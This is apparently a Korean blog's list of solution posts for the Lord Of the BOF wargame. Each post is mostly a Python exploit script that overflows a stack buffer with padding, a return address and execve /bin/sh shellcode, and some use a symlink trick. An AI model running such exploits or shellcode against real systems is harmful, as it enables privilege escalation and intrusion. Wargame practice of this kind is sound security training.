[Remind] LOB orge -> troll

Wargame/Lord Of the Bof(redhat) 2019. 4. 15. 20:11

exploit.py


import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/orge/troll'
shellAddress =  p(0xbffffba8)
payload = "A"*44+shellAddress
shellCode = "\x90"*28+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"


os.system("/bin/ln -s " + path + " " + shellCode)


os.execl("./"+shellCode,"./"+shellCode,payload)


'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB vampire -> skeleton  (0) 2019.04.16
[Remind] LOB troll -> vampire  (0) 2019.04.16
[Remind] LOB darkelf -> orge  (0) 2019.04.15
[Remind] LOB wolfman -> darkelf  (0) 2019.04.12
[Remind] LOB goblin -> orc  (0) 2019.04.11
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

[Remind] LOB darkelf -> orge

Wargame/Lord Of the Bof(redhat) 2019. 4. 15. 19:57

exploit.py


import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/darkelf/orge'
shellAddress =  p(0xbffffb8c)
payload = "A"*44+shellAddress
shellCode = "\x90"*27+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"


os.system("/bin/ln -s " + path + " " + shellCode)


os.execl("./"+shellCode,"./"+shellCode,payload)


'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB troll -> vampire  (0) 2019.04.16
[Remind] LOB orge -> troll  (0) 2019.04.15
[Remind] LOB wolfman -> darkelf  (0) 2019.04.12
[Remind] LOB goblin -> orc  (0) 2019.04.11
[Remind] LOB cobolt -> goblin  (0) 2019.04.10
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

[Remind] LOB wolfman -> darkelf

Wargame/Lord Of the Bof(redhat) 2019. 4. 12. 01:52

exploit.py


import os


from struct import *


p = lambda x : pack("<L" , x)


path = '/home/wolfman/darkelf'


shellAddress =  p(0xbffffb12)


payload = "A"*44+shellAddress


shellCode = "\x90"*105+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"


os.system("/bin/ln -s " + path + " " + shellCode)


os.execl("./"+shellCode,"./"+shellCode,payload)

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB orge -> troll  (0) 2019.04.15
[Remind] LOB darkelf -> orge  (0) 2019.04.15
[Remind] LOB goblin -> orc  (0) 2019.04.11
[Remind] LOB cobolt -> goblin  (0) 2019.04.10
[Remind] LOB gremlin -> cobolt  (0) 2019.04.10
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

[Remind] LOB goblin -> orc

Wargame/Lord Of the Bof(redhat) 2019. 4. 11. 00:21

exploit.py


import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/goblin/orc'
shellAddress =  p(0xbffffc30)
payload = "A"*44 + shellAddress
payload1 = "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"
os.execl(path,path,payload,payload1)

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB darkelf -> orge  (0) 2019.04.15
[Remind] LOB wolfman -> darkelf  (0) 2019.04.12
[Remind] LOB cobolt -> goblin  (0) 2019.04.10
[Remind] LOB gremlin -> cobolt  (0) 2019.04.10
[Remind] LOB gate -> gremlin  (0) 2019.04.10
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

[Remind] LOB cobolt -> goblin

Wargame/Lord Of the Bof(redhat) 2019. 4. 10. 22:51

exploit.py


import os


from struct import *





p = lambda x : pack("<L" , x)


path = '/home/cobolt/goblin'


shellAddress =  p(0xbffffba9)


payload = "A"*20+shellAddress


print payload


(python exploit.py ;cat) | ./goblin


'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB wolfman -> darkelf  (0) 2019.04.12
[Remind] LOB goblin -> orc  (0) 2019.04.11
[Remind] LOB gremlin -> cobolt  (0) 2019.04.10
[Remind] LOB gate -> gremlin  (0) 2019.04.10
LOB nightmare -> xavius  (0) 2018.01.12
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

[Remind] LOB gremlin -> cobolt

Wargame/Lord Of the Bof(redhat) 2019. 4. 10. 21:56

exploit.py




import os


from struct import *





p = lambda x : pack("<L" , x)





path = '/home/gremlin/cobolt'


shellAddress =  p(0xbffffc44)


payload = "A"*20+shellAddress





os.execl(path,path,payload)

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB goblin -> orc  (0) 2019.04.11
[Remind] LOB cobolt -> goblin  (0) 2019.04.10
[Remind] LOB gate -> gremlin  (0) 2019.04.10
LOB nightmare -> xavius  (0) 2018.01.12
LOB succubus -> nightmare  (0) 2018.01.12
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

[Remind] LOB gate -> gremlin

Wargame/Lord Of the Bof(redhat) 2019. 4. 10. 20:55

exploit.py


import os


from struct import *





p = lambda x : pack("<L" , x)





shellAddress =  p(0xbffff948)





payload = "\x90"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x90"*31+"AAAA"+shellAddress


print payload


os.execl('/home/gate/gremlin','/home/gate/gremlin',payload)

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB cobolt -> goblin  (0) 2019.04.10
[Remind] LOB gremlin -> cobolt  (0) 2019.04.10
LOB nightmare -> xavius  (0) 2018.01.12
LOB succubus -> nightmare  (0) 2018.01.12
LOB zombie_assassin -> succubus  (0) 2018.01.11
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

ROOT-ME ELF - Anti debug

2019. 3. 8. 16:37

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

ROOT-ME APK - Anti-debug

2019. 3. 8. 15:06

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

ROOT-ME PE - SEHVEH

2019. 3. 8. 13:34

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

공지사항

글 보관함

달력

«   2025/01   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

티스토리툴바